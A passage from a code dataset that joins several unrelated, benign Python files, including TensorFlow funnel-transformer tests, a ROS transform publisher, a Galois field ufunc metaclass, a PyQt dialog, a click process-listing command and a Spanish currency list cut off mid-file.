"max", "TransformerEncoderBlock"),
("float32_max", "float32", tf.float32, "max", "TransformerEncoderBlock"),
("mix_avg", "mixed_float16", tf.float16, "avg",
"TransformerEncoderBlock"),
("float32_avg", "float32", tf.float32, "avg", "TransformerEncoderBlock"))
def test_network_creation(self, policy, pooled_dtype, pool_type,
transformer_cls):
tf.keras.mixed_precision.set_global_policy(policy)
hidden_size = 32
sequence_length = 21
pool_stride = 2
num_layers = 3
# Create a small FunnelTransformerEncoder for testing.
test_network = funnel_transformer.FunnelTransformerEncoder(
vocab_size=100,
hidden_size=hidden_size,
num_attention_heads=2,
num_layers=num_layers,
pool_stride=pool_stride,
pool_type=pool_type,
max_sequence_length=sequence_length,
unpool_length=0,
transformer_cls=transformer_cls)
# Create the inputs (note that the first dimension is implicit).
word_ids = tf.keras.Input(shape=(sequence_length,), dtype=tf.int32)
mask = tf.keras.Input(shape=(sequence_length,), dtype=tf.int32)
type_ids = tf.keras.Input(shape=(sequence_length,), dtype=tf.int32)
dict_outputs = test_network([word_ids, mask, type_ids])
data = dict_outputs["sequence_output"]
pooled = dict_outputs["pooled_output"]
self.assertIsInstance(test_network.transformer_layers, list)
self.assertLen(test_network.transformer_layers, num_layers)
self.assertIsInstance(test_network.pooler_layer, tf.keras.layers.Dense)
# Stride=2 compresses sequence length to half the size at each layer.
# For pool_type = max or avg,
# this configuration gives each layer of seq length: 21->11->6->3.
# For pool_type = truncated_avg,
# seq length: 21->10->5->2.
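    # (Judging from those numbers, max/avg pooling keeps ceil(len/stride)
    # positions per layer while truncated_avg keeps floor(len/stride).)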
if pool_type in ["max", "avg"]:
expected_data_shape = [None, 3, hidden_size]
else:
expected_data_shape = [None, 2, hidden_size]
expected_pooled_shape = [None, hidden_size]
self.assertAllEqual(expected_data_shape, data.shape.as_list())
self.assertAllEqual(expected_pooled_shape, pooled.shape.as_list())
# The default output dtype is float32.
# If float_dtype is set to float16, the data output is float32 (from a layer
# norm) and pool output should be float16.
self.assertAllEqual(tf.float32, data.dtype)
self.assertAllEqual(pooled_dtype, pooled.dtype)
def test_network_creation_dense(self):
tf.keras.mixed_precision.set_global_policy("mixed_float16")
pool_type = "avg"
hidden_size = 32
sequence_length = 21
dense_sequence_length = 3
pool_stride = 2
num_layers = 3
# Create a small FunnelTransformerEncoder for testing.
test_network = funnel_transformer.FunnelTransformerEncoder(
vocab_size=100,
hidden_size=hidden_size,
num_attention_heads=2,
num_layers=num_layers,
pool_stride=pool_stride,
pool_type=pool_type,
max_sequence_length=sequence_length + dense_sequence_length,
unpool_length=0,
transformer_cls="TransformerEncoderBlock")
# Create the inputs (note that the first dimension is implicit).
word_ids = tf.keras.Input(shape=(sequence_length,), dtype=tf.int32)
mask = tf.keras.Input(shape=(sequence_length,), dtype=tf.int32)
type_ids = tf.keras.Input(shape=(sequence_length,), dtype=tf.int32)
dense_inputs = tf.keras.Input(
shape=(dense_sequence_length, hidden_size), dtype=tf.float32)
dense_mask = tf.keras.Input(shape=(dense_sequence_length,), dtype=tf.int32)
dense_type_ids = tf.keras.Input(
shape=(dense_sequence_length,), dtype=tf.int32)
dict_outputs = test_network(
[word_ids, mask, type_ids, dense_inputs, dense_mask, dense_type_ids])
data = dict_outputs["sequence_output"]
pooled = dict_outputs["pooled_output"]
self.assertIsInstance(test_network.transformer_layers, list)
self.assertLen(test_network.transformer_layers, num_layers)
self.assertIsInstance(test_network.pooler_layer, tf.keras.layers.Dense)
# Stride=2 compresses sequence length to half the size at each layer.
# For pool_type = max or avg,
# this configuration gives each layer of seq length: 24->12->6->3.
expected_data_shape = [None, 3, hidden_size]
expected_pooled_shape = [None, hidden_size]
self.assertAllEqual(expected_data_shape, data.shape.as_list())
self.assertAllEqual(expected_pooled_shape, pooled.shape.as_list())
def test_invalid_stride_and_num_layers(self):
hidden_size = 32
num_layers = 3
pool_stride = [2, 2]
unpool_length = 1
with self.assertRaisesRegex(ValueError,
"pool_stride and num_layers are not equal"):
_ = funnel_transformer.FunnelTransformerEncoder(
vocab_size=100,
hidden_size=hidden_size,
num_attention_heads=2,
num_layers=num_layers,
pool_stride=pool_stride,
unpool_length=unpool_length)
@parameterized.named_parameters(
("no_stride_no_unpool", 1, 0),
("stride_list_with_unpool", [2, 3, 4], 1),
("large_stride_with_unpool", 3, 1),
("large_stride_with_large_unpool", 5, 10),
("no_stride_with_unpool", 1, 1),
)
def test_all_encoder_outputs_network_creation(self, pool_stride,
unpool_length):
hidden_size = 32
sequence_length = 21
num_layers = 3
# Create a small FunnelTransformerEncoder for testing.
test_network = funnel_transformer.FunnelTransformerEncoder(
vocab_size=100,
hidden_size=hidden_size,
num_attention_heads=2,
num_layers=num_layers,
pool_stride=pool_stride,
unpool_length=unpool_length)
# Create the inputs (note that the first dimension is implicit).
word_ids = tf.keras.Input(shape=(sequence_length,), dtype=tf.int32)
mask = tf.keras.Input(shape=(sequence_length,), dtype=tf.int32)
type_ids = tf.keras.Input(shape=(sequence_length,), dtype=tf.int32)
dict_outputs = test_network([word_ids, mask, type_ids])
all_encoder_outputs = dict_outputs["encoder_outputs"]
pooled = dict_outputs["pooled_output"]
expected_data_shape = [None, sequence_length, hidden_size]
expected_pooled_shape = [None, hidden_size]
self.assertLen(all_encoder_outputs, num_layers)
if isinstance(pool_stride, int):
pool_stride = [pool_stride] * num_layers
for layer_pool_stride, data in zip(pool_stride, all_encoder_outputs):
expected_data_shape[1] = unpool_length + (
expected_data_shape[1] + layer_pool_stride - 1 -
unpool_length) // layer_pool_stride
self.assertAllEqual(expected_data_shape, data.shape.as_list())
self.assertAllEqual(expected_pooled_shape, pooled.shape.as_list())
# The default output dtype is float32.
self.assertAllEqual(tf.float32, all_encoder_outputs[-1].dtype)
self.assertAllEqual(tf.float32, pooled.dtype)
@parameterized.named_parameters(
("all_sequence", None, 3, 0),
("output_range", 1, 1, 0),
("all_sequence_wit_unpool", None, 4, 1),
("output_range_with_unpool", 1, 1, 1),
("output_range_with_large_unpool", 1, 1, 2),
)
def test_network_invocation(self, output_range, out_seq_len, unpool_length):
hidden_size = 32
sequence_length = 21
vocab_size = 57
num_types = 7
pool_stride = 2
# Create a small FunnelTransformerEncoder for testing.
test_network = funnel_transformer.FunnelTransformerEncoder(
vocab_size=vocab_size,
hidden_size=hidden_size,
num_attention_heads=2,
num_layers=3,
type_vocab_size=num_types,
output_range=output_range,
pool_stride=pool_stride,
unpool_length=unpool_length)
# Create the inputs (note that the first dimension is implicit).
word_ids = tf.keras.Input(shape=(sequence_length,), dtype=tf.int32)
mask = tf.keras.Input(shape=(sequence_length,), dtype=tf.int32)
type_ids = tf.keras.Input(shape=(sequence_length,), dtype=tf.int32)
dict_outputs = test_network([word_ids, mask, type_ids])
data = dict_outputs["sequence_output"]
pooled = dict_outputs["pooled_output"]
# Create a model based off of this network:
model = tf.keras.Model([word_ids, mask, type_ids], [data, pooled])
# Invoke the model. We can't validate the output data here (the model is too
# complex) but this will catch structural runtime errors.
batch_size = 3
word_id_data = np.random.randint(
vocab_size, size=(batch_size, sequence_length))
mask_data = np.random.randint(2, size=(batch_size, sequence_length))
type_id_data = np.random.randint(
num_types, size=(batch_size, sequence_length))
outputs = model.predict([word_id_data, mask_data, type_id_data])
self.assertEqual(outputs[0].shape[1], out_seq_len) # output_range
# Creates a FunnelTransformerEncoder with max_sequence_length !=
# sequence_length
max_sequence_length = 128
test_network = funnel_transformer.FunnelTransformerEncoder(
vocab_size=vocab_size,
hidden_size=hidden_size,
max_sequence_length=max_sequence_length,
num_attention_heads=2,
num_layers=3,
type_vocab_size=num_types,
pool_stride=pool_stride)
dict_outputs = test_network([word_ids, mask, type_ids])
data = dict_outputs["sequence_output"]
pooled = dict_outputs["pooled_output"]
model = tf.keras.Model([word_ids, mask, type_ids], [data, pooled])
outputs = model.predict([word_id_data, mask_data, type_id_data])
self.assertEqual(outputs[0].shape[1], 3)
# Creates a FunnelTransformerEncoder with embedding_width != hidden_size
test_network = funnel_transformer.FunnelTransformerEncoder(
vocab_size=vocab_size,
hidden_size=hidden_size,
max_sequence_length=max_sequence_length,
num_attention_heads=2,
num_layers=3,
type_vocab_size=num_types,
embedding_width=16,
pool_stride=pool_stride)
dict_outputs = test_network([word_ids, mask, type_ids])
data = dict_outputs["sequence_output"]
pooled = dict_outputs["pooled_output"]
model = tf.keras.Model([word_ids, mask, type_ids], [data, pooled])
outputs = model.predict([word_id_data, mask_data, type_id_data])
self.assertEqual(outputs[0].shape[-1], hidden_size)
self.assertTrue(hasattr(test_network, "_embedding_projection"))
def test_serialize_deserialize(self):
# Create a network object that sets all of its config options.
kwargs = dict(
vocab_size=100,
hidden_size=32,
num_layers=3,
num_attention_heads=2,
max_sequence_length=21,
type_vocab_size=12,
inner_dim=1223,
inner_activation="relu",
output_dropout=0.05,
attention_dropout=0.22,
initializer="glorot_uniform",
output_range=-1,
embedding_width=16,
embedding_layer=None,
norm_first=False,
pool_type="max",
pool_stride=2,
unpool_length=0,
transformer_cls="TransformerEncoderBlock")
network = funnel_transformer.FunnelTransformerEncoder(**kwargs)
expected_config = dict(kwargs)
expected_config["inner_activation"] = tf.keras.activations.serialize(
tf.keras.activations.get(expected_config["inner_activation"]))
expected_config["initializer"] = tf.keras.initializers.serialize(
tf.keras.initializers.get(expected_config["initializer"]))
self.assertEqual(network.get_config(), expected_config)
# Create another network object from the first object's config.
new_network = funnel_transformer.FunnelTransformerEncoder.from_config(
network.get_config())
# If the serialization was successful, the new config should match the old.
self.assertAllEqual(network.get_config(), new_network.get_config())
# Tests model saving/loading.
model_path = self.get_temp_dir() + "/model"
network_wrapper = SingleLayerModel(network)
# One forward-path to ensure input_shape.
batch_size = 3
sequence_length = 21
vocab_size = 100
num_types = 12
word_id_data = np.random.randint(
vocab_size, size=(batch_size, sequence_length))
mask_data = np.random.randint(2, size=(batch_size, sequence_length))
type_id_data = np.random.randint(
num_types, size=(batch_size, sequence_length))
_ = network_wrapper.predict([word_id_data, mask_data, type_id_data])
network_wrapper.save(model_path)
_ = tf.keras.models.load_model(model_path)
if __name__ == "__main__":
tf.test.main()
|
StarcoderdataPython
|
6496594
|
<gh_stars>1-10
import os
import pytest
from app.movie import format_movie_year_min
from app.movie import format_vote_average
from app.movie import format_runtime_min
from app.movie import format_runtime_max
from app.movie import format_movie_certification
from app.movie import genre_string_to_id
from app.movie import run_API
CI_ENV = os.getenv("CI") == "false"
def test_movie_year_min():
assert format_movie_year_min("1990") == "1990-01-01"
assert format_movie_year_min("") == None
def test_vote_average():
assert format_vote_average("7.2") == 7.2
assert format_vote_average("") == None
with pytest.raises(ValueError) as ERROR:
format_vote_average("seventy")
def test_runtime_min():
assert format_runtime_min("100") == 100
assert format_runtime_min("") == None
with pytest.raises(ValueError) as ERROR:
format_runtime_min("one-hundred")
def test_runtime_max():
assert format_runtime_max("100") == 100
assert format_runtime_max("") == None
with pytest.raises(ValueError) as ERROR:
format_runtime_max("one-hundred")
def test_movie_certification():
assert format_movie_certification("PG") == "PG"
assert format_movie_certification("") == None
def test_genre_string_to_id():
assert genre_string_to_id("Animation") == "16"
assert genre_string_to_id("") == None
CI_ENV = os.getenv("CI") == "true"
@pytest.mark.skipif(CI_ENV==True, reason="to avoid issuing HTTP requests on the CI server") # skips this test on CI
def test_run_API():
assert run_API("two-thousand", None, None, None, None, None, None, None) == None
|
StarcoderdataPython
|
1977048
|
#! /usr/bin/env python
import geometry_msgs.msg
import rospy
import tf2_ros
if __name__ == '__main__':
"""
Broadcast a transform from parent_frame to target_frame forever,
with changing translation.
"""
rospy.init_node('dummy_transform_publisher', anonymous=True)
br = tf2_ros.TransformBroadcaster()
current_transform = geometry_msgs.msg.TransformStamped()
current_transform.header.frame_id = rospy.get_param('~parent_frame')
current_transform.child_frame_id = rospy.get_param('~child_frame')
# Ensure rotation quaternion is well-formed
current_transform.transform.rotation.w = 1.0
osc_rate_hz = rospy.get_param('~osc_rate')
update_rate_hz = rospy.get_param('~update_rate')
# we oscillate between 0 and 1, so this is our step size
# for osc_rate = 1Hz, update_rate = 60Hz -> 1/60
step_size = (1.0 * osc_rate_hz) / update_rate_hz
update_rate = rospy.Rate(update_rate_hz)
counting_up = True
while not rospy.is_shutdown():
current_transform.header.stamp = rospy.Time.now()
if counting_up:
current_transform.transform.translation.x += step_size
if current_transform.transform.translation.x >= 1.0:
counting_up = False
else:
current_transform.transform.translation.x -= step_size
if current_transform.transform.translation.x <= 0.0:
counting_up = True
br.sendTransform(current_transform)
update_rate.sleep()
|
StarcoderdataPython
|
8195012
|
<filename>Number_LetterToHexAndBin.py
import time
while True:
user_input = input("Enter a letter: ")
letter_as_num = ord(user_input)
time.sleep(1)
print("Decimal: {:d}".format(letter_as_num))
print("Hexadecimal: {:02x}".format(letter_as_num))
time.sleep(0.76)
print("************************************")
time.sleep(1)
|
StarcoderdataPython
|
5074938
|
<filename>back/simulador/__init__.py
from .event import *
from .model import *
from .process import *
from .simulation import *
from .simulator import *
|
StarcoderdataPython
|
9780533
|
"""
A module that contains a metaclass mixin that provides NumPy ufunc overriding for an ndarray subclass.
"""
import numpy as np
from ._calculate import CalculateMeta
from ._lookup import LookupMeta
class UfuncMeta(LookupMeta, CalculateMeta):
"""
A mixin class that provides the basics for compiling ufuncs.
"""
# pylint: disable=no-value-for-parameter,abstract-method
_UNSUPPORTED_UFUNCS_UNARY = [
np.invert,
np.log2, np.log10,
np.exp, np.expm1, np.exp2,
np.sin, np.cos, np.tan,
np.sinh, np.cosh, np.tanh,
np.arcsin, np.arccos, np.arctan,
np.arcsinh, np.arccosh, np.arctanh,
np.degrees, np.radians,
np.deg2rad, np.rad2deg,
np.floor, np.ceil, np.trunc, np.rint,
]
_UNSUPPORTED_UFUNCS_BINARY = [
np.hypot, np.arctan2,
np.logaddexp, np.logaddexp2,
np.fmod, np.modf,
np.fmin, np.fmax,
]
_UNSUPPORTED_UFUNCS = _UNSUPPORTED_UFUNCS_UNARY + _UNSUPPORTED_UFUNCS_BINARY
_UFUNCS_REQUIRING_VIEW = [
np.bitwise_and, np.bitwise_or, np.bitwise_xor,
np.left_shift, np.right_shift,
np.positive,
]
_OVERRIDDEN_UFUNCS = {
np.add: "_ufunc_routine_add",
np.negative: "_ufunc_routine_negative",
np.subtract: "_ufunc_routine_subtract",
np.multiply: "_ufunc_routine_multiply",
np.reciprocal: "_ufunc_routine_reciprocal",
np.floor_divide: "_ufunc_routine_divide",
np.true_divide: "_ufunc_routine_divide",
np.divmod: "_ufunc_routine_divmod",
np.remainder: "_ufunc_routine_remainder",
np.power: "_ufunc_routine_power",
np.square: "_ufunc_routine_square",
np.log: "_ufunc_routine_log",
np.sqrt: "_ufunc_routine_sqrt",
np.matmul: "_ufunc_routine_matmul",
}
def __init__(cls, name, bases, namespace, **kwargs):
super().__init__(name, bases, namespace, **kwargs)
cls._ufuncs = {}
def _compile_ufuncs(cls):
"""
Compile/re-compile the ufuncs based on the `ufunc_mode`. This may be supplemented in GF2Meta, GF2mMeta, GFpMeta, and GFpmMeta.
"""
cls._ufuncs = {} # Reset the dictionary so each ufunc will get recompiled
if cls.ufunc_mode == "jit-lookup":
cls._build_lookup_tables()
def _ufunc(cls, name):
"""
Returns the ufunc for the specific type of arithmetic. The ufunc compilation is based on `ufunc_mode`.
"""
if name not in cls._ufuncs:
if cls.ufunc_mode == "jit-lookup":
cls._ufuncs[name] = cls._ufunc_lookup(name)
elif cls.ufunc_mode == "jit-calculate":
cls._ufuncs[name] = cls._ufunc_calculate(name)
else:
cls._ufuncs[name] = cls._ufunc_python(name)
return cls._ufuncs[name]
###############################################################################
# Ufuncs written in NumPy operations (not JIT compiled)
###############################################################################
@staticmethod
def _sqrt(a):
raise NotImplementedError
###############################################################################
# Input/output conversion functions
###############################################################################
def _verify_unary_method_not_reduction(cls, ufunc, method): # pylint: disable=no-self-use
if method in ["reduce", "accumulate", "reduceat", "outer"]:
raise ValueError(f"Ufunc method {method!r} is not supported on {ufunc.__name__!r}. Reduction methods are only supported on binary functions.")
def _verify_binary_method_not_reduction(cls, ufunc, method): # pylint: disable=no-self-use
if method in ["reduce", "accumulate", "reduceat"]:
raise ValueError(f"Ufunc method {method!r} is not supported on {ufunc.__name__!r} because it takes inputs with type {cls.name} array and integer array. Different types do not support reduction.")
def _verify_method_only_call(cls, ufunc, method): # pylint: disable=no-self-use
if not method == "__call__":
raise ValueError(f"Ufunc method {method!r} is not supported on {ufunc.__name__!r}. Only '__call__' is supported.")
def _verify_operands_in_same_field(cls, ufunc, inputs, meta): # pylint: disable=no-self-use
if len(meta["non_field_operands"]) > 0:
raise TypeError(f"Operation {ufunc.__name__!r} requires both operands to be {cls.name} arrays, not {[inputs[i] for i in meta['operands']]}.")
def _verify_operands_in_field_or_int(cls, ufunc, inputs, meta): # pylint: disable=no-self-use
for i in meta["non_field_operands"]:
if isinstance(inputs[i], (int, np.integer)):
pass
elif isinstance(inputs[i], np.ndarray):
if meta["field"].dtypes == [np.object_]:
if not (inputs[i].dtype == np.object_ or np.issubdtype(inputs[i].dtype, np.integer)):
raise ValueError(f"Operation {ufunc.__name__!r} requires operands with type np.ndarray to have integer dtype, not {inputs[i].dtype}.")
else:
if not np.issubdtype(inputs[i].dtype, np.integer):
raise ValueError(f"Operation {ufunc.__name__!r} requires operands with type np.ndarray to have integer dtype, not {inputs[i].dtype}.")
else:
raise TypeError(f"Operation {ufunc.__name__!r} requires operands that are not {cls.name} arrays to be integers or an integer np.ndarray, not {type(inputs[i])}.")
def _verify_operands_first_field_second_int(cls, ufunc, inputs, meta): # pylint: disable=no-self-use
if len(meta["operands"]) == 1:
return
if not meta["operands"][0] == meta["field_operands"][0]:
raise TypeError(f"Operation {ufunc.__name__!r} requires the first operand to be a {cls.name} array, not {meta['types'][meta['operands'][0]]}.")
if len(meta["field_operands"]) > 1 and meta["operands"][1] == meta["field_operands"][1]:
raise TypeError(f"Operation {ufunc.__name__!r} requires the second operand to be an integer array, not {meta['types'][meta['operands'][1]]}.")
second = inputs[meta["operands"][1]]
if isinstance(second, (int, np.integer)):
return
# elif type(second) is np.ndarray:
# if not np.issubdtype(second.dtype, np.integer):
# raise ValueError(f"Operation {ufunc.__name__!r} requires the second operand with type np.ndarray to have integer dtype, not {second.dtype}.")
elif isinstance(second, np.ndarray):
if meta["field"].dtypes == [np.object_]:
if not (second.dtype == np.object_ or np.issubdtype(second.dtype, np.integer)):
raise ValueError(f"Operation {ufunc.__name__!r} requires operands with type np.ndarray to have integer dtype, not {second.dtype}.")
else:
if not np.issubdtype(second.dtype, np.integer):
raise ValueError(f"Operation {ufunc.__name__!r} requires operands with type np.ndarray to have integer dtype, not {second.dtype}.")
else:
raise TypeError(f"Operation {ufunc.__name__!r} requires the second operand to be an integer or integer np.ndarray, not {type(second)}.")
def _view_inputs_as_ndarray(cls, inputs, kwargs, dtype=None): # pylint: disable=no-self-use
# View all inputs that are Galois field arrays as np.ndarray to avoid infinite recursion
v_inputs = list(inputs)
for i in range(len(inputs)):
if issubclass(type(inputs[i]), cls):
v_inputs[i] = inputs[i].view(np.ndarray) if dtype is None else inputs[i].view(np.ndarray).astype(dtype)
# View all output arrays as np.ndarray to avoid infinite recursion
if "out" in kwargs:
outputs = kwargs["out"]
v_outputs = []
for output in outputs:
if issubclass(type(output), cls):
o = output.view(np.ndarray) if dtype is None else output.view(np.ndarray).astype(dtype)
else:
o = output
v_outputs.append(o)
kwargs["out"] = tuple(v_outputs)
return v_inputs, kwargs
def _view_output_as_field(cls, output, field, dtype): # pylint: disable=no-self-use
if isinstance(type(output), field):
return output
elif isinstance(output, np.ndarray):
return output.astype(dtype).view(field)
elif output is None:
return None
else:
return field(output, dtype=dtype)
###############################################################################
# Ufunc routines
###############################################################################
def _ufunc_routine_add(cls, ufunc, method, inputs, kwargs, meta):
cls._verify_operands_in_same_field(ufunc, inputs, meta)
inputs, kwargs = cls._view_inputs_as_ndarray(inputs, kwargs)
output = getattr(cls._ufunc("add"), method)(*inputs, **kwargs)
output = cls._view_output_as_field(output, meta["field"], meta["dtype"])
return output
def _ufunc_routine_negative(cls, ufunc, method, inputs, kwargs, meta): # pylint: disable=unused-argument
cls._verify_unary_method_not_reduction(ufunc, method)
inputs, kwargs = cls._view_inputs_as_ndarray(inputs, kwargs)
output = getattr(cls._ufunc("negative"), method)(*inputs, **kwargs)
output = cls._view_output_as_field(output, meta["field"], meta["dtype"])
return output
def _ufunc_routine_subtract(cls, ufunc, method, inputs, kwargs, meta):
cls._verify_operands_in_same_field(ufunc, inputs, meta)
inputs, kwargs = cls._view_inputs_as_ndarray(inputs, kwargs)
output = getattr(cls._ufunc("subtract"), method)(*inputs, **kwargs)
output = cls._view_output_as_field(output, meta["field"], meta["dtype"])
return output
def _ufunc_routine_multiply(cls, ufunc, method, inputs, kwargs, meta):
if len(meta["non_field_operands"]) > 0:
# Scalar multiplication
cls._verify_operands_in_field_or_int(ufunc, inputs, meta)
inputs, kwargs = cls._view_inputs_as_ndarray(inputs, kwargs)
inputs[meta["non_field_operands"][0]] = np.mod(inputs[meta["non_field_operands"][0]], cls.characteristic)
inputs, kwargs = cls._view_inputs_as_ndarray(inputs, kwargs)
output = getattr(cls._ufunc("multiply"), method)(*inputs, **kwargs)
output = cls._view_output_as_field(output, meta["field"], meta["dtype"])
return output
def _ufunc_routine_reciprocal(cls, ufunc, method, inputs, kwargs, meta): # pylint: disable=unused-argument
cls._verify_unary_method_not_reduction(ufunc, method)
inputs, kwargs = cls._view_inputs_as_ndarray(inputs, kwargs)
output = getattr(cls._ufunc("reciprocal"), method)(*inputs, **kwargs)
output = cls._view_output_as_field(output, meta["field"], meta["dtype"])
return output
def _ufunc_routine_divide(cls, ufunc, method, inputs, kwargs, meta):
cls._verify_operands_in_same_field(ufunc, inputs, meta)
inputs, kwargs = cls._view_inputs_as_ndarray(inputs, kwargs)
output = getattr(cls._ufunc("divide"), method)(*inputs, **kwargs)
output = cls._view_output_as_field(output, meta["field"], meta["dtype"])
return output
def _ufunc_routine_divmod(cls, ufunc, method, inputs, kwargs, meta):
q = cls._ufunc_routine_divide(ufunc, method, inputs, kwargs, meta)
r = cls.Zeros(q.shape)
output = q, r
return output
def _ufunc_routine_remainder(cls, ufunc, method, inputs, kwargs, meta):
# Perform dummy addition operation to get shape of output zeros
x = cls._ufunc_routine_add(ufunc, method, inputs, kwargs, meta)
output = cls.Zeros(x.shape)
return output
def _ufunc_routine_power(cls, ufunc, method, inputs, kwargs, meta):
cls._verify_binary_method_not_reduction(ufunc, method)
cls._verify_operands_first_field_second_int(ufunc, inputs, meta)
inputs, kwargs = cls._view_inputs_as_ndarray(inputs, kwargs)
output = getattr(cls._ufunc("power"), method)(*inputs, **kwargs)
output = cls._view_output_as_field(output, meta["field"], meta["dtype"])
return output
def _ufunc_routine_square(cls, ufunc, method, inputs, kwargs, meta): # pylint: disable=unused-argument
cls._verify_unary_method_not_reduction(ufunc, method)
inputs = list(inputs) + [2]
inputs, kwargs = cls._view_inputs_as_ndarray(inputs, kwargs)
output = getattr(cls._ufunc("power"), method)(*inputs, **kwargs)
output = cls._view_output_as_field(output, meta["field"], meta["dtype"])
return output
def _ufunc_routine_log(cls, ufunc, method, inputs, kwargs, meta): # pylint: disable=unused-argument
cls._verify_method_only_call(ufunc, method)
inputs = list(inputs) + [int(cls.primitive_element)]
inputs, kwargs = cls._view_inputs_as_ndarray(inputs, kwargs)
output = getattr(cls._ufunc("log"), method)(*inputs, **kwargs)
return output
def _ufunc_routine_sqrt(cls, ufunc, method, inputs, kwargs, meta): # pylint: disable=unused-argument
cls._verify_method_only_call(ufunc, method)
x = inputs[0]
b = x.is_quadratic_residue() # Boolean indicating if the inputs are quadratic residues
if not np.all(b):
raise ArithmeticError(f"Input array has elements that are quadratic non-residues (do not have a square root). Use `x.is_quadratic_residue()` to determine if elements have square roots in {cls.name}.\n{x[~b]}")
return cls._sqrt(*inputs)
def _ufunc_routine_matmul(cls, ufunc, method, inputs, kwargs, meta): # pylint: disable=unused-argument
cls._verify_method_only_call(ufunc, method)
return cls._matmul(*inputs, **kwargs)
|
StarcoderdataPython
|
25028
|
<reponame>VagnerGit/PythonCursoEmVideo<filename>desafio_005_antecessor_e_sucessor.py
"""
Python Exercise 5:
Write a program that reads an integer and
shows its successor and predecessor on the screen.
"""
n = int(input('enter an integer '))
#ant = n-1
#post = n+1
#print('The predecessor of {} is {} and the successor is {}'.format(n, ant, post))
print('{}: the predecessor is {} and the successor is {}'.format(n, (n-1), (n+1)))
|
StarcoderdataPython
|
9658600
|
# This file was auto generated; Do not modify, if you value your sanity!
import ctypes
import enum
from ics.structures.s_phy_reg_pkt_clause22_mess import *
from ics.structures.s_phy_reg_pkt_clause45_mess import *
class Nameless9872(ctypes.Structure):
_fields_ = [
('Enabled', ctypes.c_uint16, 1),
('WriteEnable', ctypes.c_uint16, 1),
('Clause45Enable', ctypes.c_uint16, 1),
('status', ctypes.c_uint16, 2),
('reserved', ctypes.c_uint16, 3),
('BusIndex', ctypes.c_uint16, 4),
('version', ctypes.c_uint16, 4),
]
class Nameless28192(ctypes.Union):
_anonymous_ = ('Nameless9872',)
_fields_ = [
('Nameless9872', Nameless9872),
('flags', ctypes.c_uint16),
]
class Nameless18906(ctypes.Union):
_fields_ = [
('clause22', PhyRegPktClause22Mess_t),
('clause45', PhyRegPktClause45Mess_t),
]
class s_phy_reg_pkt(ctypes.Structure):
_anonymous_ = ('Nameless28192', 'Nameless18906')
_fields_ = [
('Nameless28192', Nameless28192),
('Nameless18906', Nameless18906),
]
SPhyRegPkt = s_phy_reg_pkt
PhyRegPkt_t = s_phy_reg_pkt
|
StarcoderdataPython
|
1942577
|
<gh_stars>0
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'dialog_Radius.ui'
#
# Created by: PyQt5 UI code generator 5.14.1
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_Dialog_Radius(object):
def setupUi(self, Dialog_Radius):
Dialog_Radius.setObjectName("Dialog_Radius")
Dialog_Radius.resize(415, 310)
self.buttonBox = QtWidgets.QDialogButtonBox(Dialog_Radius)
self.buttonBox.setGeometry(QtCore.QRect(30, 240, 341, 32))
self.buttonBox.setOrientation(QtCore.Qt.Horizontal)
self.buttonBox.setStandardButtons(QtWidgets.QDialogButtonBox.Ok)
self.buttonBox.setObjectName("buttonBox")
self.frame = QtWidgets.QFrame(Dialog_Radius)
self.frame.setGeometry(QtCore.QRect(40, 50, 351, 131))
self.frame.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.frame.setFrameShadow(QtWidgets.QFrame.Raised)
self.frame.setObjectName("frame")
self.label_radius = QtWidgets.QLabel(self.frame)
self.label_radius.setGeometry(QtCore.QRect(100, 20, 161, 20))
font = QtGui.QFont()
font.setPointSize(13)
self.label_radius.setFont(font)
self.label_radius.setObjectName("label_radius")
self.horizontalSlider_radius = QtWidgets.QSlider(self.frame)
self.horizontalSlider_radius.setGeometry(QtCore.QRect(10, 50, 331, 22))
self.horizontalSlider_radius.setMaximum(250)
self.horizontalSlider_radius.setOrientation(QtCore.Qt.Horizontal)
self.horizontalSlider_radius.setObjectName("horizontalSlider_radius")
self.labe_radius_value = QtWidgets.QLabel(self.frame)
self.labe_radius_value.setGeometry(QtCore.QRect(20, 80, 81, 20))
self.labe_radius_value.setObjectName("labe_radius_value")
self.retranslateUi(Dialog_Radius)
self.buttonBox.accepted.connect(Dialog_Radius.accept)
self.buttonBox.rejected.connect(Dialog_Radius.reject)
QtCore.QMetaObject.connectSlotsByName(Dialog_Radius)
def retranslateUi(self, Dialog_Radius):
_translate = QtCore.QCoreApplication.translate
Dialog_Radius.setWindowTitle(_translate("Dialog_Radius", "Dialog"))
self.label_radius.setText(_translate("Dialog_Radius", "Radius of circle"))
self.labe_radius_value.setText(_translate("Dialog_Radius", "Radius value "))
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
Dialog_Radius = QtWidgets.QDialog()
ui = Ui_Dialog_Radius()
ui.setupUi(Dialog_Radius)
Dialog_Radius.show()
sys.exit(app.exec_())
|
StarcoderdataPython
|
1666602
|
<gh_stars>1-10
from hodgepodge.click import str_to_ints, str_to_strs
import click
import hodgepodge.processes
@click.group()
def processes():
"""
Query processes.
"""
@processes.command()
@click.option('--pids')
@click.option('--ppids')
@click.option('--names')
@click.option('--hide-empty-values/--show-empty-values', 'remove_empty_values')
def get_processes(pids: str, ppids: str, names: str, remove_empty_values: bool):
for process in hodgepodge.processes.iter_processes(
pids=str_to_ints(pids),
ppids=str_to_ints(ppids),
names=str_to_strs(names),
):
click.echo(process.to_json(remove_empty_values=remove_empty_values))
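# Invocation sketch (assumes this `processes` group is registered under a parent
# click CLI; the executable name below is a placeholder):
#   $ hodgepodge processes get-processes --names chrome,firefox --hide-empty-values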
|
StarcoderdataPython
|
9608033
|
<reponame>StabbarN/faker<filename>faker/providers/currency/es_ES/__init__.py<gh_stars>10-100
from .. import Provider as CurrencyProvider
class Provider(CurrencyProvider):
# Format: (code, name)
currencies = (
("AED", "Dírham de los Emiratos Árabes Unidos"),
("AFN", "Afghaní"),
("ALL", "Lek albanés"),
("AMD", "Dram armenio"),
("ANG", "Florín de las Antillas Holandesas"),
("AOA", "Kwanza angoleño"),
("ARS", "Peso argentino"),
("AUD", "Dólar australiano"),
("AWG", "Florín arubeño"),
("AZN", "Manat azerbaiyano"),
("BAM", "Marco bosnioherzegovino"),
("BBD", "Dólar barbadense"),
("BDT", "Taka bangladesí"),
("BGN", "Lev búlgaro"),
("BHD", "Dinar bahreiní"),
("BIF", "Franco burundés"),
("BMD", "Dólar de Bermudas"),
("BND", "Dólar bruneano"),
("BOB", "Boliviano"),
("BRL", "Real brasileño"),
